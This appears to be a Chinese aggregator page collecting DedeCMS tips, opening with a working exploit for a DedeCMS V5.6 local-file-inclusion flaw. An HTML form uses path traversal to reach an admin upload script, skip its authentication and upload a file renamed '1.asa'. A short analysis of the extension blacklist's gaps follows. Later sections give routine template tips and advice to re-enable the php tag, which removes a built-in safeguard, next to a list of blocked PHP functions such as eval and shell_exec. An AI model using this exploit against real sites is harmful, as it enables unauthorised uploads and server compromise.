在这里,我们将给大家分享关于DedeCmsV5.6本地包含里的上传漏洞(可是那包含漏洞已经公布)的知识,同时也会涉及到如何更有效地DedeCMS5.7标签tag长度限制的修改办法、dedecms5.7
在这里,我们将给大家分享关于DedeCms V5.6 本地包含里的上传漏洞 (可是那包含漏洞已经公布)的知识,同时也会涉及到如何更有效地DedeCMS 5.7 标签tag长度限制的修改办法、dedecms 5.7怎样在任意位置显示自由列表标题+链接、dedecms channel标签中使用php和sql、DedeCMS Error:Tag disabled:php错误的完整处理办法的内容。
本文目录一览:- DedeCms V5.6 本地包含里的上传漏洞 (可是那包含漏洞已经公布)
- DedeCMS 5.7 标签tag长度限制的修改办法
- dedecms 5.7怎样在任意位置显示自由列表标题+链接
- dedecms channel标签中使用php和sql
- DedeCMS Error:Tag disabled:php错误的完整处理办法
DedeCms V5.6 本地包含里的上传漏洞 (可是那包含漏洞已经公布)
DedeCmsV5.6 本地包含DedeCmsV5.6 本地包含
http://t00ls.net/thread-8608-1-1.html
之前就发现了这本地包含的利用方法。
<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch">
<input type="hidden" name="newname" value="1.asa">
<input type="file" name="uploadfile">
<input type="submit" value="搜索" name="QuickSearchBtn">
</form>简单分析:
文件:select_soft_post.php
<?php
if(!isset($cfg_basedir))
{
include_once(dirname(__FILE__).''/config.php'');
}
//config.php 是用于验证是否管理员。由于本地包含, $cfg_basedir 已经设置了值,应该跳过了验证。
//文件名(前为手工指定, 后者自动处理)
if(!empty($newname))
{
$filename = $newname;
if(!ereg("\.", $filename)) $fs = explode(''.'', $uploadfile_name);
else $fs = explode(''.'', $filename);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你指定的文件名被系统禁止!",''javascript:;'');
exit();
}
if(!ereg("\.", $filename)) $filename = $filename.''.''.$fs[count($fs)-1];
}else{
$filename = $cuserLogin->getUserID().''-''.dd2char(MyDate(''ymdHis'',$nowtme));
$fs = explode(''.'', $uploadfile_name);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!",''javascript:;'');
exit();
}
$filename = $filename.''.''.$fs[count($fs)-1];
}// 这里强制限定的某些文件类型禁止上传
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml|zip|rar|7z|txt";
即可以上传非上面类型的文件,有时也并不鸡肋。。
DedeCMS 5.7 标签tag长度限制的修改办法
大家都知道默认情况下,dedecms的标签tag长度是12个字节,也就是6个汉字,哪知道在织梦5.7中,也没有改掉这个烦恼的事,可能这个设定是基于效率问题考虑的,如果更新的时候设置的长度超过这个字符,系统就会不显示这个tag。有时候需要根据实际情况修改tag的长度,下面是办法,测试可用。
1.修改数据库中表dede_tagindex 和dede_taglist的tag字段属性:varchar(12)修改为varchar(255) 。
这个步骤需要直接操作数据库。
2.修改文件:/include/helpers/archive.helper.php
查找:if(isset($tag[12]) 修改为:if(isset($tag[255]) ;
再将if(isset($tag[20]) 修改为:if(isset($tag[255]) 。
本文章网址:http://www.ppssdd.com/code/13690.html。转载请保留出处,谢谢合作!
dedecms 5.7怎样在任意位置显示自由列表标题+链接
dedecms 5.7怎样在任意位置显示自由列表标题+链接?
为什么会有这样的问题呢,因为找了半天没有发现织梦cms中调用自由列表的标签.在度哥上也没找到答案.那就只有自己捉摸了.下面是我用到的办法,其实是很简单的,只需要一句简单的sql代码就可以实现了
{dede:sql sql="select * From dede_freelist limit 100"}
<a href=http://www.dede58.com/a/dedejq/"[field:listdir/]">[field:title/]</a>
{/dede:sql}
前提是必须删除添加自由列表时地址时前面出现的 {listdir}标签.
如图:
本文章网址:http://www.ppssdd.com/code/14438.html。转载请保留出处,谢谢合作!
dedecms channel标签中使用php和sql
{dede:channel type='son' }[field:id runphp='yes']
global $dsql;
$sql='Select content from arctype where id=@me';
$row=$dsql->getone();
......
.....
[/field:id]
{/dede:channel} 本文章网址:http://www.ppssdd.com/code/14491.html。转载请保留出处,谢谢合作!
DedeCMS Error:Tag disabled:php错误的完整处理办法
网站提示DedeCMS Error:Tag disabled:"php" more...!
在*新的织梦CMSdedecms5.7版本与7月15号的补丁里,官方增加了源码引擎禁用的全局设置,
用于控制哪些源码标签无法被加载,所有支持的源码标签可见系统目录下的“\include\taglib”,默认php标签是被禁用的。
当你还原数据的以后,有可能原来备份里没这个选项,或者是你禁用了源码里的php标签,所以才会报错 。
处理办法如下:
我们先登录后台找到网站后台--系统--系统基本参数---其他选项 ---源码引擎禁用标签。
如果没有找到这一项,请到后台-系统-系统设置-SQL命令行工具里运行一下下面的sql语句
INSERT INTO `dede_sysconfig` (`varname`, `info`, `groupid`, `type`, `value`) VALUES ('cfg_disable_funs', '源码引擎禁用PHP函数', 7, 'bstring', 'phpinfo,eval,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents');
INSERT INTO `dede_sysconfig` (`varname`, `info`, `groupid`, `type`, `value`) VALUES ('cfg_disable_tags', '源码引擎禁用标签', 7, 'bstring', 'php');
然后在织梦CMS网站后台--系统--系统基本参数---其他选项 ---源码引擎禁用标签里把php删除掉保存就正常了。
本文章网址:http://www.ppssdd.com/code/14225.html。转载请保留出处,谢谢合作!关于DedeCms V5.6 本地包含里的上传漏洞 (可是那包含漏洞已经公布)的介绍现已完结,谢谢您的耐心阅读,如果想了解更多关于DedeCMS 5.7 标签tag长度限制的修改办法、dedecms 5.7怎样在任意位置显示自由列表标题+链接、dedecms channel标签中使用php和sql、DedeCMS Error:Tag disabled:php错误的完整处理办法的相关知识,请在本站寻找。
本文标签:
![[转帖]Ubuntu 安装 Wine方法(ubuntu如何安装wine)](https://www.gvkun.com/zb_users/cache/thumbs/4c83df0e2303284d68480d1b1378581d-180-120-1.jpg)
